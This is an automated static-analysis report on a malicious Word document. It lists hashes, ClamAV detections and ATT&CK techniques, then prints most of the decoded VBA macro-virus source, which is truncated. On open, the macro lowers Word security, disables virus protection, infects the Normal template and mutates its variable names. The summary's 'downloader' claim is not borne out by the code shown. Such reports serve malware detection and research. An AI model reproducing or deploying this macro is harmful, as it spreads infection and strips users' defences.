Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6afade65a90a0879…

MALICIOUS

Office (OLE)

34.5 KB Created: 2003-09-17 19:15:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 6af958f3ee9f9444b1e5633560dcd4d3 SHA-1: e63bd53461596c89be746d7d07e25634ec821838 SHA-256: 6afade65a90a08791a959dfd6d39982d4ed82032be8ec431005c915e0d757a38
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to lower Word's security settings and execute further code, indicating it's likely a downloader for a secondary stage. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Kpmv-1' further confirm its malicious nature.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4811 bytes
SHA-256: 742d4cdd629919d47c1cbc897d2b3076d5c00de2b8f8168834210f722a0870fe
Detection
ClamAV: Doc.Trojan.Kpmv-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Classe1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Document_Open(): On Error Resume Next

Dim ci73r7(27) As String: ci73r7(0) = "pz08x6": ci73r7(1) = "em32f0": ci73r7(2) = "em71a0": ci73r7(3) = "rc78s4": ci73r7(4) = "eh99f9": ci73r7(5) = "ed26f8": ci73r7(6) = "rc78s4": ci73r7(7) = "rt51q4": System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

ci73r7(8) = "ke77v5": ci73r7(9) = "eo06y8": ci73r7(10) = "vk24i1": ci73r7(11) = "tr58e2": ci73r7(12) = "ve43n1": ci73r7(13) = "rx69m3": ci73r7(14) = "cl47o8": ci73r7(15) = "oh00r3": Options.VirusProtection = False

ci73r7(16) = "lz48l4": ci73r7(17) = "px81e2": ci73r7(18) = "kc32b4": ci73r7(19) = "xq21t8": ci73r7(20) = "gs36v6": ci73r7(21) = "rb07u2": ci73r7(22) = "ci73r7": ci73r7(23) = "cj21t6": Options.SaveNormalPrompt = False

ci73r7(24) = "vq90j8": ci73r7(25) = "jj35u3": ci73r7(26) = "zn24h7": ci73r7(27) = "lr52v2": Options.ConfirmConversions = False

Set pz08x6 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule

Set em32f0 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule

Set em71a0 = ThisDocument.VBProject.VBComponents.Item(1).CodeModule

eh99f9 = "private sub" & " document_open()": ed26f8 = "end" & " sub"

rc78s4 = em71a0.Lines(1, em71a0.CountOfLines)

rt51q4 = InStr(LCase(rc78s4), eh99f9)

ke77v5 = InStr(rt51q4, LCase(rc78s4), ed26f8) + Len(ed26f8)

eo06y8 = Mid(rc78s4, rt51q4, ke77v5 - rt51q4)

If pz08x6.CountOfLines <> 0 Then

vk24i1 = pz08x6.Lines(1, pz08x6.CountOfLines)

If InStr(vk24i1, "(27) As String") = 0 Then

If InStr(LCase(vk24i1), eh99f9) <> 0 Then

tr58e2 = False

For ve43n1 = 1 To pz08x6.CountOfLines: DoEvents

If tr58e2 = False Then

If LCase(pz08x6.Lines(ve43n1, 1)) = eh99f9 Then

tr58e2 = True

rx69m3 = ve43n1

End If

Else

If LCase(pz08x6.Lines(ve43n1, 1)) = ed26f8 Then

cl47o8 = ve43n1

Exit For

End If

End If

Next

pz08x6.DeleteLines rx69m3, cl47o8 - (rx69m3 - 1)

End If

Set oh00r3 = pz08x6

pz08x6.addfromstring eo06y8: If ActiveDocument.Saved = False Then ActiveDocument.Save

End If

Else

Set oh00r3 = pz08x6

pz08x6.addfromstring eo06y8: If ActiveDocument.Saved = False Then ActiveDocument.Save

End If

If em32f0.CountOfLines <> 0 Then

lz48l4 = em32f0.Lines(1, em32f0.CountOfLines)

If InStr(lz48l4, "(27) As String") = 0 Then

If InStr(LCase(lz48l4), eh99f9) <> 0 Then

tr58e2 = False

For ve43n1 = 1 To em32f0.CountOfLines: DoEvents

If tr58e2 = False Then

If LCase(em32f0.Lines(ve43n1, 1)) = eh99f9 Then

tr58e2 = True

rx69m3 = ve43n1

End If

Else

If LCase(em32f0.Lines(ve43n1, 1)) = ed26f8 Then

cl47o8 = ve43n1

Exit For

End If

End If

Next

em32f0.DeleteLines rx69m3, cl47o8 - (rx69m3 - 1)

End If

Set oh00r3 = em32f0

em32f0.addfromstring eo06y8: If NormalTemplate.Saved = False Then NormalTemplate.Save

End If

Else

Set oh00r3 = em32f0

em32f0.addfromstring eo06y8: If NormalTemplate.Saved = False Then NormalTemplate.Save

End If

If oh00r3 <> "" Then

Dim px81e2 As Long, kc32b4 As Long, xq21t8 As Long, gs36v6 As Long

For rb07u2 = 0 To UBound(ci73r7): DoEvents

Randomize: cj21t6 = Chr(97 + (Rnd * 25)) & Chr(97 + (Rnd * 25)) & Chr(48 + (Rnd * 9)) & Chr(48 + (Rnd * 9)) & Chr(97 + (Rnd * 25)) & Chr(48 + (Rnd * 9)): DoEvents

px81e2 = 1: kc32b4 = 1

With oh00r3

Do While .Find(ci73r7(rb07u2), px81e2, kc32b4, xq21t8, gs36v6, True)

vq90j8 = .Lines(xq21t8, 1)

jj35u3 = Mid(vq90j8, 1, kc32b
... (truncated)